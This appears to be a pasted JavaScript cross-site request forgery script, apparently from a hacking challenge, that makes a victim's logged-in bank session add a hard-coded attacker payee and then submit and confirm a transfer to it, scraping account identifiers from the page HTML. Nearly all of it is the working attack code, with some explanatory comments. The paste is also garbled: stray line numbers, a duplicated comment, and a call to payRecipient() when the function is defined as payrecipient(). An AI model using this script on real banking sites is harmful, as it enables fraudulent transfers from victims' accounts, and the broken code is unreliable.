smeacham

HTB - CSRF

Dec 17th, 2013
  //Define the variables for who we want to give money to
  // Every value below is a plain string that is concatenated directly into
  // the form-encoded POST bodies built in addRecipient() and payrecipient().
  var my_first_name = 'Steve'; //first name
  var my_last_name = 'Meacham'; //last name
  var my_email = 'pastebinjunk@stevemeacham.me'; //email address
  var security_question = 'my company'; //security question for  money transfer
  var security_answer = 'Meacham & Meacham'; //response to security question no spaces allowed
  var today_day = '31'; //today's day (hard-coded string, not derived from Date)
  var today_month = '7'; //today's month (hard-coded string)
  var today_year = '2013'; //today's year (hard-coded string)
  var my_amount = '20'; //amount you want to transfer. Must be at least $10

  // Globals written by parseResponseSendrecipient() and read by payrecipient();
  // they stay undefined until the StartPaymentScreen response has been parsed.
  var from_account; // variable to hold the 'from' account for posting transfer request
  var to_account; //variable to hold the 'to' account for posting transfer
  var current_server_response; //not used
  15.  
  16.  
  17.  
  18. //generic HTTPObject - can be extended to include IE support
  //generic HTTPObject - can be extended to include IE support
  /**
   * Factory for the browser's XMLHttpRequest.
   *
   * @returns {XMLHttpRequest|false|undefined} a new XMLHttpRequest; `false`
   *   when the constructor threw; `undefined` when XMLHttpRequest is not
   *   defined in this environment at all.
   */
  function getHTTPObject() {
    // No XMLHttpRequest global at all -> nothing to construct.
    if (typeof XMLHttpRequest === 'undefined') {
      return undefined;
    }
    var request;
    try {
      request = new XMLHttpRequest();
    } catch (err) {
      // Constructor failure is reported as `false`, not rethrown.
      request = false;
    }
    return request;
  }
  40.  
  41.  
  // Entry point. Both functions are declared further down; the calls work
  // because function declarations are hoisted. Neither call returns anything
  // and no response is checked, so a failed stage goes unnoticed.
  addRecipient(); //adds malicious recipient
  payRecipient(); //pays malicious recipient
  44.  
  45. //function to add recipient
  function addRecipient () {
  // Walks the bank's "add recipient" flow as four sequential, blocking POSTs
  // (sendBankRequest uses a synchronous XMLHttpRequest). Whatever cookies the
  // bank set are attached by the browser to each same-origin request, which is
  // what lets forged requests pass as the victim's own. Returns nothing; every
  // response body is discarded.
  //
  // Note for defenders: SVTKN is the same hard-coded literal in all four
  // requests. A token that is constant and known in advance gives no CSRF
  // protection; a per-session, unpredictable, server-validated token (plus
  // SameSite cookies) is what would stop this sequence.

  //First go to payments page
  sendBankRequest('banksecure/funcs/mainBalance','REQUESTYPE=CheckBalance&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0');

  //Now go to add recipient page
  sendBankRequest('banksecure/funcs/payFnds', 'REQUESTYPE=addRecipient&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0');

  //Enter in the info for the recipient that you want to add and give the security question and answer
  // NAME is built as first+last; the other fields come straight from the globals at the top.
  sendBankRequest('banksecure/funcs/payFnds', 'REQUESTYPE=addNewRecipient&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0&NAME= ' + my_first_name + '+' + my_last_name + '&EMAIL=' + my_email + '&QUESTION=' + security_question + '&ANSWER=' + security_answer + '&CONFIRM_ANSWER=' + security_answer);

  //Verify the details of the request
  // Same fields again plus VERIFY_RSPNS=OK, i.e. the confirmation step is replayed automatically.
  sendBankRequest('banksecure/funcs/payFnds', 'REQUESTYPE=verifyRequest&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0&NAME= ' + my_first_name + '+' + my_last_name + '&EMAIL=' + my_email + '&QUESTION=' + security_question + '&ANSWER=' + security_answer + '&CONFIRM_ANSWER=' + security_answer + '&VERIFY_RSPNS=OK');


  //recipient is added!

  }
  64.  
  function payrecipient() {
  // Schedules a one-off payment to the recipient added by addRecipient():
  // fetch the payment screen, scrape the account identifiers out of its HTML
  // (into the globals from_account / to_account), then submit and confirm the
  // payment. All requests are blocking POSTs; nothing is returned.
  // Note: if the scrape in parseResponseSendrecipient fails, both globals stay
  // undefined and the following requests are still sent.

  var resp;

  //Send a request to do an online payment
  resp = sendBankRequest('banksecure/funcs/onlinePayments','REQUESTYPE=StartPaymentScreen&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0');

  //Parse out the response to find the unique account values for 'to' and 'from'
  parseResponseSendrecipient (resp);

  //make payment request
  // DAY/MONTH/YEAR are the hard-coded strings from the top of the file, not the current date.
  sendBankRequest('banksecure/funcs/onlinePayments','REQUESTYPE=MakePayment&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0&AMOUNT=' + my_amount +'&FROM_ACCT=' + from_account + '&TO_ACCNT=' + to_account + '&DAY=' + today_day +'&MONTH=' + today_month + '&YEAR=' + today_year + '&FREQUENCY=once');

  //confirm payment details
  // The confirmation step re-sends every field plus the security answer and VERIFY_RSPNS=OK,
  // so the "are you sure" screen adds no friction when the answer is already known.
  sendBankRequest('banksecure/funcs/onlinePayments','REQUESTYPE=ConfirmPayment&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0&AMOUNT=' + my_amount +'&FROM_ACCT=' + from_account + '&TO_ACCNT=' + to_account + '&DAY=' + today_day +'&MONTH=' + today_month + '&YEAR=' + today_year + '&FREQUENCY=once' + '&QUESTION=' + security_question + '&ANSWER=' + security_answer + '&CONFIRM_ANSWER=' + security_answer + '&VERIFY_RSPNS=OK');

  //Payment sent!
  }
  83.  
  84.  
  85.  
  86. //Function to send request to bank
  /**
   * Sends one blocking, form-encoded POST to a path relative to the current
   * page and returns the raw response body.
   *
   * @param {string} my_page - relative URL such as 'banksecure/funcs/payFnds';
   *   it resolves against the page the script runs in, so this only works from
   *   the bank's own origin — a cross-origin XMLHttpRequest could not read
   *   responseText under the same-origin policy.
   * @param {string} my_post_params - pre-built application/x-www-form-urlencoded body
   * @returns {string} xmlhttp.responseText of the completed request
   * @throws {TypeError} when getHTTPObject() yields undefined/false, since
   *   xmlhttp.open is then called on a non-object
   */
  function sendBankRequest(my_page, my_post_params) {
   //the object that makes it all possible!
   var xmlhttp = getHTTPObject();


   // note the third argument is whether or not the call will be 'asynchronous' - by specifying false we are blocking for the response.
   // This of course destroys the first 'A' in AJAX but since we are attacking somebody else who the hell cares!
   // (Synchronous XHR on the main thread is deprecated in current browsers.)
   xmlhttp.open("POST", my_page, false);

   //define headers exactly as they are given in a valid browser-based request
   // User-Agent is a forbidden request header in current browsers: setRequestHeader
   // silently ignores it and the browser's real UA is sent, so server-side logs
   // still see the genuine client.
   xmlhttp.setRequestHeader('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508  Firefox/1.5.0.12');
   xmlhttp.setRequestHeader('Accept-Language','en-us,en;q=0.5');
   xmlhttp.setRequestHeader('Accept-Charset','ISO-8859-1,utf-8;q=0.7,*;q=0.7');

    //more HTTP headers
    xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

    //send the request and return the response
    // Because the request is synchronous, responseText is populated by the time send() returns.
    xmlhttp.send(my_post_params);
    return xmlhttp.responseText;

  }
  109.  
  110.  
  111.  
  112. //Search through specific page for to and from accounts
  113. //Using this same technique we could pick out an anti-CSRF token
  114. //Basically this is just parsing HTML
  /**
   * Scrapes two account identifiers out of the HTML returned by the
   * StartPaymentScreen request and stores them in the globals from_account
   * and to_account. Side effect only; nothing is returned.
   *
   * The +30, -2 and -40 offsets are tied to the exact markup of that page —
   * TODO confirm against the page, any markup change breaks them. Neither
   * indexOf result is checked for -1, so a missing marker produces a
   * meaningless substring rather than an error.
   *
   * @param {string} my_response - raw HTML body from sendBankRequest()
   */
  function parseResponseSendrecipient (my_response) {


     //look through page for the account number they are using for the victim
     var from_index = my_response.indexOf('from_account=\"client_val\"');

     // Assumes the account value starts 30 characters past the marker and ends
     // 2 characters before the next '>' — TODO confirm against the page.
     from_account = my_response.substring(from_index + 30,my_response.indexOf('>',from_index) - 2);

     //now we look for the to account
     // The recipient's display name (as rendered by the bank, first + space + last) is the anchor.
     var to_index = my_response.indexOf(my_first_name + ' ' + my_last_name);

     //estimate that the value can't be more than 40 characters previous to this
     // Searches forward from 40 characters before the name for the first '"';
     // if the name sits within the first 40 characters this start index is negative.
     var to_option_index = to_index - 40;
     to_option_index = my_response.indexOf('\"', to_option_index);

     // Everything between that quote and 2 characters before the name is taken as the account value.
     to_account = my_response.substring(to_option_index + 1, to_index - 2);

  }